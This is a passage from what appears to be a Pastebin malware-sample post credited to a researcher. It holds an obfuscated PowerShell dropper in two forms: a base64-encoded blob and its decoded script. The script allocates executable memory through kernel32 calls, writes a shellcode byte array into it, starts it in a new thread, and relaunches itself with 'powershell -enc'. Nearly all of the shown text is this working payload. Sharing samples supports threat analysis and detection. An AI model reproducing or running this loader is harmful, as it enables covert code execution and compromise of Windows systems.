2ACwAMAB4ADMAMgAsADAAeABlADYALAAwAHgAMAA1ACwAMAB4AGMANwAsADAAeAAwADEALAAwAHgAMQA4ACwAMAB4AGQANgAsADAAeAA0AGUALAAwAHgAOAA1ACwAMAB4ADcAMgAsADAAeABkADIALAAwAHgAMAAwACwAMAB4ADIAZgAsADAAeAA5AGMALAAwAHgAOABjACwAMAB4AGMAOAAsADAAeABkAGEALAAwAHgAZQA0ACwAMAB4AGEAZQAsADAAeAA4AGYALAAwAHgAZABiACwAMAB4ADMAYwAsADAAeABmAGYALAAwAHgANwAwACwAMAB4ADcANAAsADAAeABlADgALAAwAHgANQA3ACwAMAB4AGQAOAAsADAAeAAyAGMALAAwAHgANwBlACwAMAB4ADcANQAsADAAeABlADAALAAwAHgAYwA4ACwAMAB4ADAANQAsADAAeAA3AGEALAAwAHgAMwA5ACwAMAB4ADYAZAAsADAAeAAzADkALAAwAHgAZgAxACwAMAB4AGQAYwAsADAAeAAyADYALAAwAHgAYgA1ACwAMAB4ADcAZQAsADAAeAA5AGIALAAwAHgAYgA4ACwAMAB4AGMAOQAsADAAeAA3AGUALAAwAHgAYgA3ACwAMAB4ADYAOQAsADAAeAAyADAALAAwAHgAZQBmACwAMAB4ADQANwAsADAAeAA4ADkALAAwAHgAYgAzACwAMAB4AGYAOAAsADAAeABlADQALAAwAHgANwA2ACwAMAB4ADQAYwAsADAAeAAwADcALAAwAHgAZABiACwAMAB4AGUAOQAsADAAeABkAGQALAAwAHgAOQBjACwAMAB4ADQANQAsADAAeAA4AGEALAAwAHgAMABmACwAMAB4ADMAOAAsADAAeABmAGUALAAwAHgAMgA5ACwAMAB4ADUAMAAsADAAeAAyADkALAAwAHgAOQA1ACwAMAB4ADgAMAAsADAAeAA5ADAALAAwAHgAZgAyACwAMAB4ADMAYQAsADAAeAA4ADgALAAwAHgAMQAyACwAMAB4ADYANwAsADAAeABiADkALAAwAHgAMQBjACwAMAB4ADcAOQAsADAAeAA3ADUALAAwAHgAZAA3ACwAMAB4ADkAZQAsADAAeAAyAGEALAAwAHgAMQAxACwAMAB4AGYAZAAsADAAeAA2ADgALAAwAHgAMABlACwAMAB4AGEAZQAsADAAeABmAGUALAAwAHgANAAxACwAMAB4ADMAYwAsADAAeAAwADAALAAwAHgAYwAxACwAMAB4ADAAZgAsADAAeABmAGIALAAwAHgANgA3ACwAMAB4AGMAMgAsADAAeABlADYALAAwAHgAMwBmACwAMAB4ADMAMwAsADAAeAA0ADkALAAwAHgAYgA0ACwAMAB4ADkAYgAsADAAeABiADQALAAwAHgANgAwACwAMAB4ADgANAAsADAAeAA1ADAALAAwAHgAYwA3ACwAMAB4AGQAMgAsADAAeAA1ADUALAAwAHgAYwBmACwAMAB4AGEAMAAsADAAeABjADAALAAwAHgAYwAzACwAMAB4ADYANgAsADAAeABkADIALAAwAHgAMQBhACwAMAB4ADMAZQAsADAAeABmAGQALAAwAHgAZAAzACwAMAB4ADkAMQAsADAAeABlAGQALAAwAHgAYQA2ACwAMAB4ADUANgAsADAAeAA5ADkALAAwAHgAOQA5ACwAMAB4ADQAMAAsADAAeAAzADMALAAwAHgAMQBhACwAMAB4ADMANQAsADAAeAAzAGQALAAwAHgANABlACwAMAB4ADUAZQAsADAAeAA5ADEALAAwAHgAYgAxACwAMAB4ADAAMAAsADAAeAAwAGMALAAwAHgAYgAxACwAMAB4AGUANAAsADAAeABmADcALAAwAHgAMQBjACwAMAB4ADEAYQAsADAAeAAwADgALAAwAHgAMgAyACwAMAB4AGUAMwAsADAAeAA3ADAALAAwAHgAZgAyACwAMAB4ADIANgAsADAAeAAyAGEALAAwAHgAZABiACwAMAB4ADkAMwAsADAAeAA3AGUALAAwAHgAMgA1ACwAMAB4ADUAYwAsADAAeAAzADEALAAwAHgAOAAwACwAMAB4ADkAZgAsADAAeAAwADgALAAwAHgAYgA2ACwAMAB4ADIAOQAsADAAeAA0ADgALAAwAHgAZgBkACwAMAB4ADMAZAAsADAAeABiAGEALAAwAHgAMABmACwAMAB4ADAAMgAsADAAeAA5ADQALAAwAHgAMgBmACwAMAB4ADEAMAAsADAAeAA5ADQALAAwAHgAZQA3ACwAMAB4ADAANQAsADAAeABiADIALAAwAHgAMwAyACwAMAB4AGYANwAsADAAeABiADMALAAwAHgANQBiACwAMAB4ADIAYQAsADAAeABmADgALAAwAHgAYwAzACwAMAB4ADYAMwAsADAAeAAwAGYALAAwAHgANwA1ACwAMAB4ADQAZQAsADAAeABmADMALAAwAHgAZgBkACwAMAB4ADIANgAsADAAeABlAGMALAAwAHgANwBlACwAMAB4ADYANgAsADAAeABmADcALAAwAHgAOQA2ACwAMAB4AGUAOQAsADAAeAAwADQALAAwAHgANgAyACwAMAB4ADUANwAsADAAeAAwADIALAAwAHgAZAAxACwAMAB4ADkAMwAsADAAeABhADgALAAwAHgAMgBkACwAMAB4AGIAZQAsADAAeAAwADYALAAwAHgAMwBkACwAMAB4AGIAMAAsADAAeAAyAGMALAAwAHgAYgA2ACwAMAB4AGEANgAsADAAeAAxAGEALAAwAHgAYwBmACwAMAB4ADIANwAsADAAeAA0ADQALAAwAHgANgAzADsAJABnACAAPQAgADAAeAAxADAAMAAwADsAaQBmACAAKAAkAHoALgBMAGUAbgBnAHQAaAAgAC0AZwB0ACAAMAB4ADEAMAAwADAAKQB7ACQAZwAgAD0AIAAkAHoALgBMAGUAbgBnAHQAaAB9ADsAJABVAHUAVwA9ACQAdwA6ADoAVgBpAHIAdAB1AGEAbABBAGwAbABvAGMAKAAwACwAMAB4ADEAMAAwADAALAAkAGcALAAwAHgANAAwACkAOwBmAG8AcgAgACgAJABpAD0AMAA7ACQAaQAgAC0AbABlACAAKAAkAHoALgBMAGUAbgBnAHQAaAAtADEAKQA7ACQAaQArACsAKQAgAHsAJAB3ADoAOgBtAGUAbQBzAGUAdAAoAFsASQBuAHQAUAB0AHIAXQAoACQAVQB1AFcALgBUAG8ASQBuAHQAMwAyACgAKQArACQAaQApACwAIAAkAHoAWwAkAGkAXQAsACAAMQApAH0AOwAkAHcAOgA6AEMAcgBlAGEAdABlAFQAaAByAGUAYQBkACgAMAAsADAALAAkAFUAdQBXACwAMAAsADAALAAwACkAOwBmAG8AcgAgACgAOwA7ACkAewBTAHQAYQByAHQALQBzAGwAZQBlAHAAIAA2ADAAfQA7ACcAOwAkAGUAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAEMAbwBuAHYAZQByAHQAXQA6ADoAVABvAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBuAGkAYwBvAGQAZQAuAEcAZQB0AEIAeQB0AGUAcwAoACQAWgBaAEwAdAApACkAOwAkAGkAegBQACAAPQAgACIALQBlAG4AYwAgACIAOwBpAGYAKABbAEkAbgB0AFAAdAByAF0AOgA6AFMAaQB6AGUAIAAtAGUAcQAgADgAKQB7ACQAcwBsAHcATwAgAD0AIAAkAGUAbgB2ADoAUwB5AHMAdABlAG0AUgBvAG8AdAAgACsAIAAiAFwAcwB5AHMAdwBvAHcANgA0AFwAVwBpAG4AZABvAHcAcwBQAG8AdwBlAHIAUwBoAGUAbABsAFwAdgAxAC4AMABcAHAAbwB3AGUAcgBzAGgAZQBsAGwAIgA7AGkAZQB4ACAAIgAmACAAJABzAGwAdwBPACAAJABpAHoAUAAgACQAZQAiAH0AZQBsAHMAZQB7ADsAaQBlAHgAIAAiACYAIABwAG8AdwBlAHIAcwBoAGUAbABsACAAJABpAHoAUAAgACQAZQAiADsAfQA= --> $ZZLt = '$9Wk = ''[DllImport("kernel32.dll")]public static extern IntPtr VirtualAlloc(IntPtr lpAddress, uint dwSize, uint flAllocationType, uint flProtect);[DllImport("kernel32.dll")]public static extern IntPtr CreateThread(IntPtr lpThreadAttributes, uint dwStackSize, IntPtr lpStartAddress, IntPtr lpParameter, uint dwCreationFlags, IntPtr lpThreadId);[DllImport("msvcrt.dll")]public static extern IntPtr memset(IntPtr dest, uint src, uint count);'';$w = Add-Type -memberDefinition $9Wk -Name "Win32" -namespace Win32Functions -passthru;[Byte[]];[Byte[]]$z = 0xba,0x84,0xbb,0x0f,0xcc,0xda,0xdd,0xd9,0x74,0x24,0xf4,0x58,0x31,0xc9,0xb1,0x6f,0x83,0xe8,0xfc,0x31,0x50,0x11,0x03,0x50,0x11,0xe2,0x71,0x47,0xe7,0x45,0x79,0xb8,0xf8,0x35,0xf0,0x5d,0xc9,0x67,0x66,0x15,0x78,0xb8,0xed,0x7b,0x71,0x33,0xa3,0x6f,0x02,0x31,0x6b,0x9f,0xa3,0xfc,0x4d,0xae,0x34,0x31,0x51,0x7c,0xf6,0x53,0x2d,0x7f,0x2b,0xb4,0x0c,0xb0,0x3e,0xb5,0x49,0xad,0xb1,0xe7,0x02,0xb9,0x60,0x18,0x27,0xff,0xb8,0x19,0xe7,0x8b,0x81,0x61,0x82,0x4c,0x75,0xd8,0x8d,0x9c,0x26,0x57,0xc5,0x04,0x4c,0x3f,0xf5,0x35,0x81,0x23,0xc9,0x7c,0xae,0x90,0xba,0x7e,0x66,0xe9,0x43,0xb1,0x46,0xa6,0x7a,0x7d,0x4b,0xb6,0xbb,0xba,0xb4,0xcd,0xb7,0xb8,0x49,0xd6,0x0c,0xc2,0x95,0x53,0x90,0x64,0x5d,0xc3,0x70,0x94,0xb2,0x92,0xf3,0x9a,0x7f,0xd0,0x5b,0xbf,0x7e,0x35,0xd0,0xbb,0x0b,0xb8,0x36,0x4a,0x4f,0x9f,0x92,0x16,0x0b,0xbe,0x83,0xf2,0xfa,0xbf,0xd3,0x5b,0xa2,0x65,0x98,0x4e,0xb7,0x1c,0xc3,0x06,0x29,0x44,0x8f,0xd6,0xdd,0xf1,0x06,0xb9,0x74,0x77,0x3e,0x11,0xef,0xcb,0xc9,0xbc,0xe8,0x2c,0xe0,0xf0,0x09,0x85,0x5d,0xa4,0xa2,0x7c,0x09,0x70,0x1b,0xf8,0x6e,0x7b,0x76,0x11,0x10,0xdf,0x48,0x2f,0x81,0x8e,0xc0,0xac,0x70,0x60,0x7f,0xe3,0x21,0xd2,0x17,0x54,0x4c,0x4d,0x21,0xa5,0x9b,0x99,0xe1,0x03,0x12,0x8c,0xac,0xdb,0x54,0x02,0x31,0x98,0x06,0x30,0xe3,0xf1,0xf4,0xe4,0x6b,0x19,0xad,0x2a,0x57,0x22,0x98,0xba,0x61,0xb6,0x32,0xe6,0x05,0xc7,0x01,0x18,0xd6,0x4e,0x85,0x72,0xd2,0x00,0x2f,0x9c,0x8c,0xc8,0xda,0xe4,0xae,0x8f,0xdb,0x3c,0xff,0x70,0x74,0xe8,0x57,0xd8,0x2c,0x7e,0x75,0xe0,0xc8,0x05,0x7a,0x39,0x6d,0x39,0xf1,0xdc,0x26,0xb5,0x7e,0x9b,0xb8,0xc9,0x7e,0xb7,0x69,0x20,0xef,0x47,0x89,0xb3,0xf8,0xe4,0x76,0x4c,0x07,0xdb,0xe9,0xdd,0x9c,0x45,0x8a,0x0f,0x38,0xfe,0x29,0x50,0x29,0x95,0x80,0x90,0xf2,0x3a,0x88,0x12,0x67,0xb9,0x1c,0x79,0x75,0xd7,0x9e,0x2a,0x11,0xfd,0x68,0x0e,0xae,0xfe,0x41,0x3c,0x00,0xc1,0x0f,0xfb,0x67,0xc2,0xe6,0x3f,0x33,0x49,0xb4,0x9b,0xb4,0x60,0x84,0x50,0xc7,0xd2,0x55,0xcf,0xa0,0xc0,0xc3,0x66,0xd2,0x1a,0x3e,0xfd,0xd3,0x91,0xed,0xa6,0x56,0x99,0x99,0x40,0x33,0x1a,0x35,0x3d,0x4e,0x5e,0x91,0xb1,0x00,0x0c,0xb1,0xe4,0xf7,0x1c,0x1a,0x08,0x22,0xe3,0x70,0xf2,0x26,0x2a,0xdb,0x93,0x7e,0x25,0x5c,0x31,0x80,0x9f,0x08,0xb6,0x29,0x48,0xfd,0x3d,0xba,0x0f,0x02,0x94,0x2f,0x10,0x94,0xe7,0x05,0xb2,0x32,0xf7,0xb3,0x5b,0x2a,0xf8,0xc3,0x63,0x0f,0x75,0x4e,0xf3,0xfd,0x26,0xec,0x7e,0x66,0xf7,0x96,0xe9,0x04,0x62,0x57,0x02,0xd1,0x93,0xa8,0x2d,0xbe,0x06,0x3d,0xb0,0x2c,0xb6,0xa6,0x1a,0xcf,0x27,0x44,0x63;$g = 0x1000;if ($z.Length -gt 0x1000){$g = $z.Length};$UuW=$w::VirtualAlloc(0,0x1000,$g,0x40);for ($i=0;$i -le ($z.Length-1);$i++) {$w::memset([IntPtr]($UuW.ToInt32()+$i), $z[$i], 1)};$w::CreateThread(0,0,$UuW,0,0,0);for (;;){Start-sleep 60};';$e = [System.Convert]::ToBase64String([System.Text.Encoding]::Unicode.GetBytes($ZZLt));$izP = "-enc ";if([IntPtr]::Size -eq 8){$slwO = $env:SystemRoot + "\syswow64\WindowsPowerShell\v1.0\powershell";iex "& $slwO $izP $e"}else{;iex "& powershell $izP $e";}
  199. acbedcba51bfcd9743e0561fd8276f97b791174bc9152bd74d6ea4523f18cc70
  200. ###:END prepared by @JohnLaTwC
RAW Paste Data
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy. OK, I Understand
 
Top